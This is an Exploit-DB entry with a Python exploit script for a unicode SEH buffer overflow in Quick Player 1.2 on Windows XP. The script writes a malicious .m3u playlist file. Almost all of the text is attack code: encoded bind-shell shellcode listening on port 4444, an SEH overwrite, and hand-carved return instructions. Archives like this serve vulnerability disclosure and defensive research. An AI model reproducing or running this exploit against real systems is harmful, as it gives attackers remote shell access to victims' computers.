Quick Player 1.2 - Unicode Buffer Overflow (2)

EDB-ID:

11046

CVE:

N/A


Author:

sinn3r

Type:

local


Platform:

Windows

Date:

2010-01-06


#!/usr/bin/python

## Quick Player v1.2 Unicode Buffer Overflow
## Found by  :  mr_me  (great job by mr_me!)  http://www.exploit-db.com/exploits/10797
## Coded by  :  sinn3r  (x90.sinner{at}gmail{d0t]c0m)
## thanks    :  corelanc0d3r's unicode article - awesome job!
## Tested on :  Windows XP SP3 ENG
## Oops! Here goes one of my n00b moments...

# windows/shell_bind_tcp lport=4444 http://metasploit.com
# Plenty of space...
bindshell = ("\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41\x54"
"\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a\x41\x42"
"\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41"
"\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41\x49\x31\x41\x49"
"\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38"
"\x41\x41\x50\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51"
"\x49\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51\x49"
"\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x33"
"\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x45\x39\x49\x51\x49\x4a"
"\x49\x49\x48\x59\x44\x31\x4a\x54\x51\x4d\x42\x35\x42\x39\x50"
"\x49\x50\x49\x51\x39\x51\x39\x50\x49\x51\x39\x50\x49\x51\x39"
"\x51\x39\x51\x39\x51\x33\x50\x43\x50\x43\x50\x43\x50\x43\x50"
"\x43\x50\x37\x42\x31\x50\x5a\x42\x4a\x51\x31\x50\x58\x50\x50"
"\x50\x30\x51\x31\x50\x30\x51\x31\x42\x4b\x51\x31\x51\x31\x42"
"\x31\x50\x32\x51\x31\x51\x32\x50\x32\x51\x32\x51\x32\x50\x30"
"\x50\x42\x51\x32\x51\x31\x51\x32\x50\x58\x42\x30\x50\x38\x51"
"\x31\x51\x32\x42\x55\x50\x4a\x51\x39\x50\x49\x42\x4c\x50\x4d"
"\x50\x38\x50\x4f\x44\x39\x50\x43\x50\x30\x50\x47\x42\x50\x50"
"\x45\x50\x50\x51\x35\x50\x30\x50\x4b\x50\x39\x50\x4a\x50\x45"
"\x50\x45\x43\x31\x50\x4e\x50\x32\x50\x43\x42\x34\x50\x4c\x50"
"\x4b\x50\x50\x51\x42\x50\x46\x50\x50\x50\x4e\x42\x4b\x42\x31"
"\x50\x42\x50\x44\x50\x4c\x50\x4c\x50\x4b\x51\x36\x50\x32\x51"
"\x37\x43\x34\x50\x4e\x42\x4b\x50\x51\x43\x32\x50\x47\x42\x38"
"\x50\x44\x50\x4f\x50\x4c\x42\x57\x51\x32\x51\x5a\x51\x35\x43"
"\x46\x51\x36\x50\x51\x50\x49\x42\x4f\x50\x46\x42\x31\x50\x4b"
"\x42\x50\x50\x4c\x42\x4c\x50\x45\x42\x4c\x50\x50\x43\x31\x50"
"\x51\x42\x4c\x51\x35\x42\x32\x50\x46\x50\x4c\x51\x35\x42\x50"
"\x50\x4a\x43\x31\x50\x4a\x42\x4f\x51\x34\x50\x4d\x51\x37\x42"
"\x51\x50\x4b\x42\x57\x51\x39\x44\x32\x50\x4c\x50\x30\x50\x46"
"\x50\x32\x50\x43\x43\x37\x50\x4e\x42\x4b\x50\x43\x42\x42\x51"
"\x34\x50\x50\x50\x4c\x50\x4b\x50\x50\x50\x42\x50\x47\x50\x4c"
"\x50\x46\x51\x51\x50\x4e\x50\x30\x50\x4e\x42\x4b\x50\x47\x50"
"\x30\x50\x42\x51\x48\x50\x4f\x42\x55\x50\x4b\x42\x50\x51\x34"
"\x50\x34\x50\x43\x43\x4a\x51\x37\x44\x31\x50\x48\x50\x50\x51"
"\x32\x44\x30\x50\x4c\x50\x4b\x50\x42\x42\x48\x50\x42\x50\x38"
"\x50\x4c\x50\x4b\x42\x31\x51\x38\x51\x37\x42\x30\x51\x37\x42"
"\x51\x50\x4e\x50\x33\x50\x4d\x50\x33\x50\x45\x42\x4c\x51\x32"
"\x43\x39\x50\x4e\x42\x4b\x51\x35\x43\x34\x50\x4c\x50\x4b\x51"
"\x37\x42\x51\x50\x49\x51\x36\x42\x30\x50\x31\x51\x39\x42\x4f"
"\x50\x44\x42\x51\x50\x4f\x50\x30\x50\x4c\x42\x4c\x50\x4b\x42"
"\x51\x50\x4a\x42\x4f\x51\x36\x42\x4d\x50\x43\x50\x31\x50\x4a"
"\x42\x47\x51\x35\x43\x38\x50\x4b\x42\x30\x50\x51\x42\x45\x50"
"\x48\x43\x44\x51\x33\x50\x33\x50\x43\x50\x4d\x50\x4a\x42\x38"
"\x51\x35\x42\x4b\x50\x43\x50\x4d\x50\x45\x44\x34\x50\x43\x51"
"\x35\x50\x48\x51\x52\x51\x32\x42\x58\x50\x4c\x50\x4b\x50\x42"
"\x44\x38\x50\x47\x51\x44\x51\x37\x44\x31\x50\x4b\x43\x33\x50"
"\x50\x43\x36\x50\x4e\x42\x4b\x50\x44\x50\x4c\x50\x42\x42\x4b"
"\x50\x4c\x50\x4b\x51\x33\x42\x48\x51\x35\x50\x4c\x50\x45\x42"
"\x31\x51\x38\x50\x53\x50\x4e\x42\x4b\x51\x36\x51\x54\x50\x4e"
"\x42\x4b\x51\x37\x44\x31\x51\x38\x42\x30\x50\x4d\x42\x39\x50"
"\x51\x42\x34\x50\x45\x42\x54\x51\x34\x42\x44\x51\x33\x42\x4b"
"\x50\x43\x42\x4b\x51\x35\x50\x31\x51\x32\x44\x39\x51\x33\x51"
"\x5a\x50\x50\x50\x51\x50\x4b\x50\x4f\x50\x4b\x50\x50\x50\x42"
"\x43\x48\x51\x33\x42\x4f\x42\x31\x50\x4a\x50\x4e\x42\x4b\x50"
"\x46\x42\x52\x50\x4a\x50\x4b\x50\x4f\x42\x56\x50\x51\x50\x4d"
"\x51\x35\x50\x38\x50\x50\x50\x33\x51\x36\x51\x42\x50\x43\x50"
"\x30\x50\x47\x42\x50\x51\x35\x50\x38\x51\x34\x50\x37\x42\x30"
"\x43\x43\x50\x44\x42\x52\x51\x33\x42\x4f\x50\x42\x43\x44\x50"
"\x51\x42\x58\x42\x30\x50\x4c\x50\x42\x42\x37\x51\x35\x44\x36"
"\x50\x47\x42\x57\x50\x4b\x50\x4f\x50\x4e\x50\x35\x50\x4f\x50"
"\x48\x50\x4c\x50\x50\x50\x45\x50\x51\x50\x47\x44\x30\x50\x45"
"\x42\x30\x50\x46\x51\x39\x50\x4f\x50\x34\x50\x46\x50\x34\x51"
"\x32\x44\x30\x51\x35\x50\x38\x42\x31\x50\x39\x50\x4b\x50\x30"
"\x42\x30\x42\x4b\x51\x33\x50\x30\x50\x4b\x50\x4f\x50\x49\x51"
"\x35\x50\x50\x42\x30\x50\x46\x50\x30\x42\x30\x42\x30\x51\x36"
"\x50\x30\x50\x51\x42\x30\x51\x36\x50\x30\x42\x31\x42\x30\x50"
"\x42\x42\x50\x51\x35\x50\x38\x51\x38\x42\x4a\x50\x46\x42\x4f"
"\x50\x49\x50\x4f\x51\x39\x42\x50\x50\x4b\x50\x4f\x50\x48\x42"
"\x35\x50\x4d\x42\x39\x50\x4b\x44\x37\x51\x36\x42\x31\x50\x4b"
"\x42\x4b\x51\x32\x42\x53\x50\x50\x51\x58\x50\x45\x51\x42\x51"
"\x35\x42\x30\x51\x36\x42\x51\x50\x43\x42\x4c\x50\x4f\x42\x59"
"\x50\x4a\x51\x36\x50\x50\x51\x5a\x51\x36\x42\x50\x51\x36\x50"
"\x36\x51\x32\x43\x47\x50\x51\x42\x58\x51\x39\x50\x52\x51\x39"
"\x50\x4b\x51\x37\x51\x37\x50\x50\x42\x47\x51\x39\x42\x4f\x50"
"\x4e\x50\x35\x50\x46\x50\x33\x50\x42\x44\x37\x42\x31\x42\x58"
"\x50\x4e\x42\x37\x50\x48\x51\x59\x51\x36\x51\x48\x50\x4b\x50"
"\x4f\x50\x4b\x50\x4f\x50\x48\x50\x55\x50\x43\x51\x53\x51\x33"
"\x42\x43\x51\x33\x51\x57\x50\x50\x42\x48\x42\x30\x42\x54\x51"
"\x38\x42\x4c\x51\x35\x42\x4b\x50\x4d\x50\x31\x50\x49\x42\x4f"
"\x50\x4b\x42\x45\x51\x33\x43\x37\x50\x4f\x43\x49\x50\x49\x51"
"\x47\x50\x42\x50\x48\x42\x31\x51\x55\x51\x32\x50\x4e\x51\x32"
"\x42\x4d\x51\x33\x42\x31\x50\x4b\x50\x4f\x50\x48\x51\x45\x50"
"\x42\x51\x38\x50\x43\x42\x33\x51\x32\x50\x4d\x42\x30\x43\x34"
"\x51\x37\x42\x50\x50\x4d\x51\x49\x51\x38\x51\x53\x50\x51\x50"
"\x47\x42\x31\x51\x37\x51\x36\x50\x37\x50\x44\x44\x31\x50\x4c"
"\x50\x36\x50\x51\x42\x5a\x50\x42\x50\x32\x42\x31\x51\x39\x50"
"\x46\x50\x36\x50\x4d\x50\x32\x51\x39\x42\x4d\x42\x30\x51\x56"
"\x50\x4a\x42\x47\x50\x47\x50\x34\x50\x45\x44\x34\x51\x35\x42"
"\x4c\x50\x46\x43\x31\x50\x46\x51\x51\x50\x4e\x42\x4d\x50\x50"
"\x51\x34\x42\x31\x50\x34\x50\x42\x50\x30\x50\x48\x50\x46\x50"
"\x47\x42\x50\x50\x47\x50\x34\x50\x51\x51\x34\x50\x50\x50\x50"
"\x50\x50\x51\x46\x50\x43\x43\x36\x51\x36\x50\x36\x42\x30\x50"
"\x46\x51\x33\x51\x56\x42\x30\x50\x4e\x50\x46\x50\x36\x51\x33"
"\x51\x56\x50\x42\x44\x33\x50\x50\x50\x56\x51\x32\x50\x48\x50"
"\x51\x51\x59\x50\x4a\x42\x4c\x50\x47\x50\x4f\x50\x4c\x50\x46"
"\x50\x4b\x50\x4f\x51\x38\x51\x45\x50\x4e\x42\x49\x50\x4d\x50"
"\x30\x42\x30\x50\x4e\x50\x50\x50\x56\x50\x43\x43\x46\x50\x4b"
"\x50\x4f\x50\x50\x50\x30\x50\x45\x50\x38\x50\x46\x51\x58\x50"
"\x4e\x51\x57\x51\x35\x50\x4d\x51\x35\x50\x30\x50\x4b\x50\x4f"
"\x50\x4b\x43\x35\x50\x4d\x42\x4b\x50\x4a\x42\x30\x50\x4f\x50"
"\x45\x50\x4c\x43\x32\x42\x31\x50\x46\x50\x42\x50\x48\x50\x4d"
"\x43\x46\x50\x4d\x50\x45\x50\x4f\x50\x4d\x50\x4f\x42\x4d\x50"
"\x4b\x50\x4f\x51\x38\x50\x55\x50\x47\x50\x4c\x51\x33\x50\x36"
"\x50\x51\x42\x4c\x51\x36\x51\x5a\x50\x4d\x50\x50\x50\x4b\x50"
"\x4b\x50\x4d\x50\x30\x50\x44\x50\x35\x50\x46\x43\x35\x50\x4f"
"\x50\x4b\x50\x42\x42\x47\x50\x46\x43\x43\x42\x30\x43\x42\x50"
"\x42\x50\x4f\x50\x43\x50\x5a\x51\x37\x44\x30\x50\x42\x42\x53"
"\x50\x49\x42\x4f\x50\x4b\x51\x55\x50\x45\x51\x4a\x51\x31\x51"
"\x31\x41\x41")

buffer = (
"\x41"*536 +	# junk
####################################################################
# SEH Chain:
"\x41\x6D"	# Pointer to Next SEH record (unicode = 0x6D004100)
"\x41\x4D"	# SE Handler (unicode format = 0x004A0059)
####################################################################
# START CARVING THE RET ADDRESS:
# 0x0012e270 (first item on the stack) + 0x11006100 - 0x11006000 = 0x0012E370 (RET)
"\x58"		# POP EAX
"\x6D"		# Separator
"\x05\x61\x11"	# ADD EAX, 0x11006100 (chars expanded due to unicode)
"\x6D"		# Separator
"\x2D\x60\x11"	# SUB EAX, 0x11006000 (chars expanded due to unicode)
"\x6D"		# Separator
"\x50"		# PUSH EAX
"\x6D"		# Separator
"\xC3"+		# RETN	; (0x0012E370)
#####################################################################
# bindshell lport 4444
"\x41"*111+	# Alignment
bindshell+	# bindshell lport 4444
"\x44"*3000)	# some mo' padding to please my eyes

f = open("quick_player_exploit.m3u", "w")
f.write(buffer)
f.close()

print "[*] quick_player_exploit.m3u created! ph33r!"